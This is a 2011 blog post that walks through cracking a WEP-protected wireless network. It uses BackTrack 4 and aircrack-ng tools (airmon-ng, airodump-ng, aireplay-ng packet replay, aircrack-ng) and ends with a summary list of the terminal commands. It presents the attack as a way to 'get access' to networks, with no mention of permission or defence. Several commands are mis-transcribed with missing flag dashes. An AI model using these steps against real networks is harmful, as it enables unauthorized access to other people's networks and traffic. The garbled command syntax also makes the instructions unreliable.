Aug 16, 2011

How to get access to wireless

To show you how to get access to a wireless network first thing you want to do is go to www.backtrack-linux.org, download the back track 4 final release or bt4-final.iso.



after downloading the iso image burn it into dvd with a free program such as imgburn found in www.imgburn.com. after you successfully burned it to a disk you want to use the disk into a computer with a wireless card and restart the computer so it boots into the dvd.



your desktop should now look like this.

now go down to the task bar and click on the command console icon to launch the command terminal.
the first thing you want to do is startup networking so type in /etc/init.d/networking start.

next you want to set the wireless card into monitor mode so type in airmon-ng to find out what is your wireless card is called. 

then after that type airmon-ng stop [your wireless card name] 
next type airmon-ng start [your wireless card name] to start the wireless card in monitor mode.

after that type airmon-ng again to see the changes. after that you need to scan the wireless signals to get their basic service set identifiers or BSSID, to do this type airodump-ng [ your wireless card name], then see wich ones have a WEP encryption then remember to write down their channel, BSSID and ESSID then hit Ctrl + C to stop. now type airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] and this will link your wireless card to that particular connection.
now leave that running and open up a new command console and type aireplay-ng -1 0 a [bssid] [wireless card name] which will associate your wireless card with the connection so it can transmit data.

then open up another new command console and type aireplay-ng -3 b [bssid][wireless card name] which will start sending and receiving data packets on the wireless connection.

now just bring up the first command console that you were using and watch the data column, you want this to run until the data hits at least 30,000 which will take about an hour or so. ones it hits 30,000 bring up the third console that is sending and receiving data and hit CTRL+C to stop it.
now type dir to view the root directory and look for a file that ends with .cap because this will have the wireless key. ones you have located the file type in aircrack-ng [filename] and it should give you the wireless key!

TERMINAL COMMANDS:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]

0 comments:

Post a Comment